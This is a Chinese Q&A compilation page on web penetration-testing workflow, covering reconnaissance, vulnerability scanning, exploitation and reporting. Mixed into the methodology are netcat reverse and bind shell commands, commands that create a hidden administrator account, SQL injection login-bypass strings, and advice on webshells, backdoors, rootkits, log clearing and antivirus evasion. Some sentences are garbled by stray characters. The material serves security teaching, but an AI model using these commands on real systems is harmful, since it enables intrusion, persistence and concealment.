當前位置:首頁 » 網頁前端 » web滲透中的信息收集
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

web滲透中的信息收集

發布時間: 2023-05-05 17:41:28

❶ 一個完整的滲透測試流程,分為那幾塊,每一塊有哪些內容

包含以下幾個流程:

信息收集

第一步做的就是信息收集,根據網站URL可以查出一系列關於該網站的信息。通過URL我們可以查到該網站的IP、該網站操作系統、腳本語言、在該伺服器上是否還有其他網站等等一些列的信息。

漏洞探測

當我們收集到了足夠多的信息之後,我們就要開始對網站進行漏洞探測了。探測網站是否存在一些常見的Web漏洞,比如:sql注入 。

漏洞利用

探測到了該網站存在漏洞之後,就要對該漏洞進行利用了。不同的漏洞有不同的利用工具,很多時候,通過一個漏洞我們很難拿到網站的webshell,我們往往需要結合幾個漏洞來拿webshell。

內網滲透

當我們能跟內網主機進行通信後,我們就要開始進行內網滲透了。可以先使用nmap對內網主機進行掃描,探測在線的主機,並且探測其使用的操作系統、開放的埠等信息。

內網中也有可能存在供內網使用的內網伺服器,可以進一步滲透拿下其許可權。

痕跡清除

達到了目的之後,有時候只是為了黑入網站掛黑頁,炫耀一下;或者在網站留下一個後門,作為肉雞,沒事的時候上去溜達溜達;亦或者掛入挖礦木馬。

撰寫滲透測試保告

在完成了滲透測試之後,就需要對這次滲透測試撰寫滲透測試報告了。明確的寫出哪裡存在漏洞,以及漏洞修補的方法。以便於網站管理員根據我們的滲透測試報告修補這些漏洞和風險,防止被黑客攻擊。

❷ 如何進行web滲透測試

Web應用的滲透測試流程主要分為3個階段:信息收集、漏洞發現、漏洞利用。

一、信息收集

在信息收集階段,我們需要盡量多的收集關於目標web應用的各種信息,比如:腳本語言的類型、伺服器的類型、目錄的結構、使用的開源軟體、資料庫類型、所有鏈接頁面,用到的框架等

二、漏洞發現

在這個階段我們在做測試的時候要對症下葯,不能盲目的去掃描,首先要確定目標應用是否使用的是公開的開源軟體,開源框架等、然後在做深一度的漏洞掃描。

三、漏洞利用

針對不同的弱點有不同的漏洞利用方式,需要的知識點也比較多。一般這個階段包括兩種方式,一種是手工測試,一種是工具測試。

手工測試

手工測試是通過客戶端或伺服器訪問目標服務,手工向目標程序發送特殊的數據,包括有效的和無效的輸入,觀察目標的狀態、對各種輸入的反應,根據結果來發現問題的漏洞檢測技術。

工具測試

網路上有很多好用的免費利用工具,比如針對sql注入的sqlmap、針對軟體漏洞的matesploit等。

❸ web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留後門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然後注入得到後台管理員賬號密碼,登錄後台,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放埠,看其主機有無可利用漏洞(nessus)埠(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下後門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到資料庫並可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。

信息收集

信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。

DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)

整站信息:伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;

網站常見搭配為:

ASP和ASPX:ACCESS、SQLServer

PHP:MySQL、PostgreSQL

JSP:Oracle、MySQL

敏感目錄信息(御劍,dirbust)

開放埠信息(nmp)

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。

常見漏洞:

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如:

Sql注入(sqlmap)

XSS(BEEF)

後台密碼爆破(burp)

埠爆破(hydra)

提權

獲得shell之後我們許可權可能很低,因此要對自己提權,可以根據伺服器版本對應的exp進行提權,對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法:

反向連接

在公網主機上進行監聽:

nc-lvp 4444

在內網主機上執行:

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行:

nc-l -p 4444 -t -e cmd.exe

本地主機上執行:

nc-vv 遠程主機ip4444

成功後,本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放埠,可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬,留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工:

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控製版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。

❹ 滲透檢測步驟

滲透測試是什麼?

滲透測試,是為了證明網路防禦按照預期計劃正常運行而提供的一種機制。不妨假設,你的公改兄老司定期更新安全策略和程序,時時給系統打補丁,並採用塵肆了漏洞掃描器等工具,以確保所有補丁都已打上。如果你早已做到了這些,為什麼還要請外方進行審查或滲透測試呢?因為,滲透測試能夠獨立地檢查你的網路策略,換句話說,就是給你的系統安了一雙眼睛。而且,進行這類測試的,都是尋找網路系統安全漏洞的專業人士。

滲透測試流程是怎樣的?

步驟一:明確目標

1、確定范圍:規劃測試目標的范圍,以至於不會出現越界的情況。

2、確定規則:明確說明滲透測試的程度、時間等。

3、確定需求:滲透測試的方向是web應用的漏洞?業務邏輯漏洞?人員許可權管理漏洞?還是其他,以免出現越界測試。

步驟二:信息收集

1、基礎信息:IP、網段、域名、埠

2、系統信息:操作系統版本

3、應用信息:各埠的應用,例如web應用、郵件應用等等

4、版本信息:所有探測到的東西的版本

5、人員信息:域名注冊人員信息,web應用中網站發帖人的id、管理員姓名等

6、防護信息:試著看能否探測到防護的設備,像有沒有CDN、waf等

步驟三:漏洞探索

利用上一步中列出的各種系統、應用等等,使用響應的漏洞

方法:

1、漏掃、awvs、IBM appscan等核升

2、結合漏洞去exploit-db等位置找利用

3、在網上尋找驗證poc

步驟四:漏洞驗證

將上述中發現有可能可以成功利用的全部漏洞都驗證一遍,結合實際情況搭建模擬環境進行實驗,成功後再引用於目標。

自動化驗證:結合自動化掃描工具提供的結果

手工驗證:根據公開的資源進行手工驗證

試驗驗證:自己搭建模擬環境進行驗證

登錄猜解:可以嘗試一下登錄口的賬號密碼的發現

業務邏輯漏洞:如發現業務邏輯漏洞,進行驗證

步驟五:信息分析

為下一步實施滲透做准備

1、精準打擊:准備好上一步探測到的漏洞的exp,用來精準打擊

2、繞過防禦機制:是否有防火牆等設備,如何繞過

3、定製攻擊路徑:最佳工具路徑,根據薄弱入口,高內網許可權位置,最終目標

4、繞過檢測機制:是否有檢測機制,流量監控,殺毒軟體 ,惡意代碼檢測等(免殺)

5、攻擊代碼:經過試驗得來的代碼,包括不限於XSS代碼,SQL注入語句等

步驟六:獲取所需

1、實施攻擊,根據前幾步的結果,進行攻擊

2、獲取內部信息:基礎設施(網路連接,vpn,路由,拓撲等)

3、進一步滲透:內網入侵,敏感目標

4、持續性存在:一般我們對客戶做滲透不需要,但真實的環境中,我們會做rookit、後門,添加管理賬號。駐扎手法。

5、清理痕跡:清理相關日誌(訪問,操作),上傳文件等

步驟七:信息整理

1、整理滲透工具:整理滲透過程中用到的代碼,poc、exp等

2、整理收集信息:整理滲透過程中收集到的一切信息

3、整理漏洞信息:整理滲透過程中遇到的各種漏洞,各種脆弱的位置信息

(為了形成報告,形成測試結果使用)

步驟八:形成報告

1、按需整理:按照之前第一步跟客戶確定好的范圍和需求來整理資料,並將資料形成報告

2、補充介紹:要對漏洞成因、驗證過程和帶來的危害進行分析

3、修補建議:當然要對所有產生的問題提出合理高效安全的解決辦法

❺ 滲透測試中信息收集都收集什麼信息

信息收集一般分為三類.

  • 被動信息收集

  • 主動信息收集

  • 針對性信息收集

    被動信息收集

  • 被動信息收集就是我們可以通過查詢域名或ip的whois,郵箱反反查等一系列的手段。在不接觸到目標的情況下來獲取一賣胡些服務信息。比如域名備案人、到期時間、主機運營機構等。這一步可以幫助我們排除攻擊目標.。

    主動信息收集

    主動信息收集就是我們可以像目標發送掃描,探測等。這一階段的主要目的是看目標開放了什麼埠,主機上運行什麼服務。根據埠或者開放的服務具體版本,我們可中毀攔以針對性的進行攻擊。

    針對性信息收集

    針對性信息收集我理解為在我們主動信息收集得到的結果上,來進一步余褲完善我們得到的信息,以達到知己知彼,百戰百勝的目的。

❻ 滲透測試七個步驟

滲透測試七個步驟如下:

步驟一:明確目標

1、確定范圍:規劃測試目標的范圍,以至於不會出現越界的情況。

2、確定規則:明確說明滲透測試的程度、時間等。

3、確定需求:滲透測試的方向是web應用的漏洞?業務邏輯漏洞?人員許可權管理漏洞?還是其他,以免出現越界測試。

步驟二:信息收集

1、基礎信息:IP、網段、域名、埠

2、系統信息:操作系統版本

3、應用信息:各埠的應用,例如web應用、郵件應用等等

4、版本信息:所有哪數探測到的東西的版本

5、人員信息:域名注冊人員信息,web應用中網站發帖人的id、管理員姓名等

6、防護信息:試著看能否探測到防護的設備,像有沒有CDN、waf等

步驟三:漏洞探索

利用上一步中列出的各種系統、應用等等,使用響應的漏洞

方法:

1、漏掃、awvs、IBM appscan等

2、結合漏洞去exploit-db等位置找利用

3、在網上尋找驗證poc

步驟四:漏洞驗證

將上述中發現有可能可以成功利用的全部漏洞都驗證一遍,結合實際情況搭建模擬環境進行實驗,成功後再引用於目標。

自動化驗證:結合自動化掃描工具提供的結果

手工驗證:根據公開的資源進行手工驗證

試驗驗證:自己搭建模擬環境進行驗證

登錄猜解:可以嘗試一下登錄口的賬號密碼的發現

業務邏輯漏洞:如發現業務邏輯漏洞,進行驗證

步驟五:信息分析

為下一步實施滲透做准備

1、精準打擊:准備好上一步探測到的漏洞的exp,顫拆用來精準打擊

2、繞過防禦機制:是否有防火牆等設備,如何繞過

3、定製攻擊路徑:最佳工具路徑,根據薄弱入口,高內網許可權位置,最終目標

4、繞過檢測機制:是否有檢測機制,流量監控,殺毒軟體 ,惡意代碼檢測等(免殺)

5、攻擊代碼:經過試驗得來的代碼,包括不限於XSS代碼,SQL注入語句等

步驟六:獲取所需

1、實施攻擊,根據前幾步的結果,李洞首進行攻擊

2、獲取內部信息:基礎設施(網路連接,vpn,路由,拓撲等)

3、進一步滲透:內網入侵,敏感目標

4、持續性存在:一般我們對客戶做滲透不需要,但真實的環境中,我們會做rookit、後門,添加管理賬號。駐扎手法。

5、清理痕跡:清理相關日誌(訪問,操作),上傳文件等

步驟七:信息整理、形成報告

1、整理滲透工具:整理滲透過程中用到的代碼,poc、exp等

2、整理收集信息:整理滲透過程中收集到的一切信息

3、整理漏洞信息:整理滲透過程中遇到的各種漏洞,各種脆弱的位置信息(為了形成報告,形成測試結果使用)

4、按需整理:按照之前第一步跟客戶確定好的范圍和需求來整理資料,並將資料形成報告

5、補充介紹:要對漏洞成因、驗證過程和帶來的危害進行分析

6、修補建議:當然要對所有產生的問題提出合理高效安全的解決辦法

❼ 如何進行Web滲透測試

1.SQL Injection(SQL注入)
(1)如何進行SQL注入測試?
首先找到帶有參數傳遞的URL頁面,如 搜索頁面,登錄頁面,提交評論頁面等等.
注1:對 於未明顯標識在URL中傳遞參數的,可以通過查看HTML源代碼中的"FORM"標簽來辨別是否還有參數傳遞.在<FORM> 和</FORM>的標簽中間的每一個參數傳遞都有可能被利用.
<form id="form_search" action="/search/" method="get">
<div>
<input type="text" name="q" id="search_q" value="" />
<input name="search" type="image" src="http://pic1.codesec.net/app_attach/20141115/20141115_21_52783_0.gif" />
<a href="/search/" class="fl">Gamefinder</a>
</div>
</form>

注 2:當你找不到有輸入行為的頁面時,可以嘗試找一些帶有某些參數的特殊的URL,如http://DOMAIN/INDEX.ASP?ID=10
其 次,在URL參數或表單中加入某些特殊的SQL語句或SQL片斷,如在登錄頁面的URL中輸入http://DOMAIN /INDEX.ASP?USERNAME='HI' OR 1=1
注1:根據實際情況,SQL注入請求可以使用以下語句:
' or 1=1- -
" or 1=1- -
or 1=1- -
' or 'a'='a
" or "a"="a
') or ('a'='a

注2:為什麼是OR, 以及',

❽ 什麼是滲透測試如何做滲透測試

滲透測試,是為了證明網路防禦按照預期計劃正常運行而提供的一種機制。不妨假設,你的公司定期更新安全策略和程序,時時給系統打補丁,並採用了漏洞掃描器等工具,以確保所有補丁都已打上。如果你早已做到了這些,為什麼還要請外方進行審查或滲透測試呢?因為,滲透測試能夠獨立地檢查你的網路策略,換句話說,就是給你的系統安了一雙眼睛。而且,進行這類測試的,都是尋找網路系統安全漏洞的專業人士。
滲透測試一定要遵循軟體測試基本流程,要知道測試過程和目標特殊,在具體實施步驟上主要包含以下幾步:
1、明確目標
當測試人員拿到需要做滲透測試的項目時,首先確定測試需求,如測試是針對業務邏輯漏洞,還是針對人員管理許可權漏洞等;然後確定客戶要求滲透測試的范圍,如ip段、域名、整站滲透或者部分模塊滲透等;最後確定滲透測試規則,如能夠滲透到什麼程度,是確定漏洞為止還是繼續利用漏洞進行更進一步的測試,是否允許破壞數據、是否能夠提升許可權等。
2、收集信息
在信息收集階段要盡量收集關於項目軟體的各種信息。比如:對於一個Web應用程序,要收集腳本類型、伺服器類型、資料庫類型以及項目所用到的框架、開源軟體等。信息收集對於滲透測試來說非常重要,只要掌握目標程序足夠多的信息,才能更好地進行漏洞檢測。
信息收集的方式可分為以下2種:主動收集、被動收集。
3、掃描漏洞
在這個階段,綜合分析收集到的信息,藉助掃描工具對目標程序進行掃描,查找存在的安全漏洞。
4、驗證漏洞
在掃描漏洞階段,測試人員會得到很多關於目標程序的安全漏洞,但這些漏洞有誤報,需要測試人員結合實際情況,搭建模擬測試環境對這些安全漏洞進行驗證。被確認的安全漏洞才能被利用執行攻擊。
5、分析信息
經過驗證的安全漏洞就可以被利用起來向目標程序發起攻擊,但是不同的安全漏洞,攻擊機制不同,針對不同的安全漏洞需要進一步分析,制定一個詳細的攻擊計劃,這樣才能保證測試順利執行。
6、滲透攻擊
滲透攻擊實際是對目標程序進行的真正攻擊,為了達到測試的目的,像是獲取用戶賬號密碼、截取目標程序傳輸數據等。滲透測試是一次性測試,在攻擊完成後能夠執行清理工作。
7、整理信息
滲透攻擊完成後,整理攻擊所獲得的信息,為後邊編寫測試報告提供依據。
8、編寫報告
測試完成之後要編寫報告,闡述項目安全測試目標、信息收集方式、漏洞掃描工具以及漏洞情況、攻擊計劃、實際攻擊結果等。此外,還要對目標程序存在的漏洞進行分析,提供安全有效的解決辦法。

❾ Web滲透是怎麼弄的

1.滲透目標
滲透網站(這里指定為www.xxx.com)
切記,在滲透之前要簽訂協議。
2.信息收集
建議手動檢查和掃描器選擇同時進行。
2.1 網站常規檢測(手動)
1:瀏覽www.xxx.com
1. 初步確定網站的類型:例如銀行,醫院,政府等。
2. 查看網站功能模,比如是否有論壇,郵箱等。
3. 重點記錄網站所有的輸入點(與資料庫交互的頁面),比如用戶登錄,用戶注冊,留言板等。4. 重點查看網站是否用到了一些通用的模板,比如論壇選擇了動網(dvbss),就有可能存在動網的漏洞;郵箱有可能選擇通用的郵箱系統,也有漏洞。
2: 分析網站的url1. 利用搜索引擎,搜索網站的url,快速找到網站的動態頁面。
2. 對網站的域名進行反查,查看IP,確定伺服器上的域名數,如果主頁面url檢測沒有漏洞,可以對其他的域名進行檢測。
3:審查代碼
重點對輸入代碼(比如表單)進行分析,看如何來提交輸入,客戶端做了哪些輸入的限制方法。
1. 隱藏表單欄位 hidden
2. Username,Password等
4:控制項分析
Active x 通常都是用c/c++編寫
在頁面上(通常是首頁)的源碼中搜索
1. 需要ComRaider+OD 對dll文件進行反編譯,看是否有漏洞。
2. 改變程序執行的路徑,破壞Active X 實施的輸入確認,看web的回應。
5:對常規的輸入進行手動注入測試,測試是否有sql注入和跨站漏洞,試用常規的用戶名和密碼登錄。
6:查看web伺服器的版本,確定搜索是否有低版本伺服器組件和框架的漏洞,比如通用的Java框架Struct2的漏洞。
2.2 工具選擇和使用
1:web應用程序漏洞掃描工具
Appscan: (版本7.8)
掃描漏洞比較全,中文,漏洞利用率高,檢測速度慢,需要大量內存,重點推薦。
AWVS:
英文,漏洞庫完善,檢測速度慢。
JSky
中文,檢測速度快,但深度一般。
Nessus
英文,檢測速度較快,漏洞也比較完善,免費,可及時更新,B/S界面。
2:埠掃描
Nmap
流光
3: 口令破解工具
溯雪
4:sql 注入工具
Asp+SqlServe, ACCESS:啊D注入工具
Php+MySQL : php+mysql注入工具(暗組的hacker欄中)
Jsp+ORACAL: CnsaferSI
支持以上資料庫 Pangolin
5: http代理請求
Paros
6:木馬
灰鴿子
7:提權木馬
一句話木馬大馬(具體所用的木馬參考文檔和工具包(綠盟,暗組))
5: 工具推薦使用方案
Appscan掃描出的重大漏洞,進行手工檢測(注意看漏洞是如何發現的,修改漏洞的代碼,對滲透幫助很大)。
sql注入漏洞
可以選用根據網站類型選擇sql注入工具
如果是post請求類型的url,選擇使用paros代理後,修改http請求包,進行注入。
WebDEV漏洞
可以啟用發送請求(比如DELETE對方網頁)
跨站漏洞
直接將appscan的代碼輸入測試,成功後,可以嘗試跨其他腳本(比如
遍歷漏洞:
網頁的目錄,下載網站配置文件信息,和源文件進行反編譯
反編譯:
Class 可以選用java 反編譯工具
Dll (asp.net) 選用Reflector
3.分析並滲透
---------------------
作者:centos2015
來源:CSDN
原文:https://blog.csdn.net/zonghua521/article/details/78272634
版權聲明:本文為博主原創文章,轉載請附上博文鏈接!

❿ 7. 滲透--信息收集(一)

完成dns、搜索引擎google、ssl、備案號、暴力破解、app反編譯、微信公眾號、jsfinder獲取二級域名信息

whois: 標準的互聯網協議,經常用來收集目標域名相關信息,網路注冊信息,注冊域名、ip地址等信息
可根據以下方法進行子域名探測:

[1]. dns域傳送漏洞

在kali下 使用 dnsenum 參數 域名 命令,來收集一個域的信息。
主要參數:
-h 查看工具使用幫助
-dnsserver <server> 指定域名伺服器
-enum 快捷鍵 相當於"--threads 5 -s 15 -w" (啟動5線程,谷歌搜索15條子域名)
-f dns.txt 指定字典文件
-w (--whois) 在一個c段網路地址范圍 提供whois查詢
--noreverse 跳過反向查詢操作

[2] 備案號查詢

網站備案查詢地址: https://icp.chinaz.com/
http://icp.bugscaner.com/

根據域名在相關網站上找到備案號信息,在根據備案號信息查找到相關域名信息。

[3] ssl證書查詢

通過查詢SSL證書,獲取的域名存活率很高。

查詢網址: https://myssl.com/ssl.html https://www.chinassl.net/ssltools/ssl-checker.html

[4]google 搜索c段
旁站:旁站是和目標賀耐網站在同一台伺服器上的其它的網站。
C段:C段是和目標伺服器ip處在同一個C段的其它服務亂拍正器。

使用網站webscan.cc查詢旁站c段。

1.參考googleHack 用法 :

2.用DotNetScan工具

工具地址:VStart50VStart50 ools漏洞利用IISPutScanner增強版

[5] app提取
反編譯APP可進行提取相關IP地址等操作。

[6] 微信公眾號

[7] JsFinder 查找子域名
將JsFinder.py復制到kali系統文件夾下,進入該文件夾使用命令 進行查詢。

-d:表示深度爬取

[8] 字典枚舉

字典枚舉法是一種傳統查找子域名的技術,這類工具有 DNSReconcile、Layer子域名挖掘機、DirBuster等。

FOFA是網路空間安全搜索引擎,收錄的是設備而不是網頁。能夠探索全球互聯網資產信息。
網站是fofa.so
搜索語法為:

ip=「1.1.1.1」嘩悔 搜索與此ip相關的網站

port="8009" 查找開發了8009埠的伺服器

domain="qq.com" 搜索跟域名帶有qq.com的網站

PS:指紋識別:其核心原理是通過正則表達式匹配特徵碼或匹配文件的md5值等特殊信息,進而識別web應用程序的名稱和版本,收集信息。

常見指紋檢測的對象

1、CMS信息:比如大漢CMS、織夢、帝國CMS、phpcms、ecshop等;

2、前端技術:比如HTML5、jquery、bootstrap、pure、ace等;

3、Web伺服器:比如Apache、lighttpd, Nginx, IIS等;

4、應用伺服器:比如Tomcat、Jboss、weblogic、websphere等;

5、開發語言:比如PHP、Java、Ruby、Python、C#等;

6、操作系統信息:比如linux、win2k8、win7、kali、centos等;

7、CDN信息:是否使用CDN,如cloudflare、360cdn、365cyd、yunjiasu等;

8、WAF信息:是否使用waf,如Topsec、Jiasule、Yunn等;

9、IP及域名信息:IP和域名注冊信息、服務商信息等;

10、埠信息:有些軟體或平台還會探測伺服器開放的常見埠。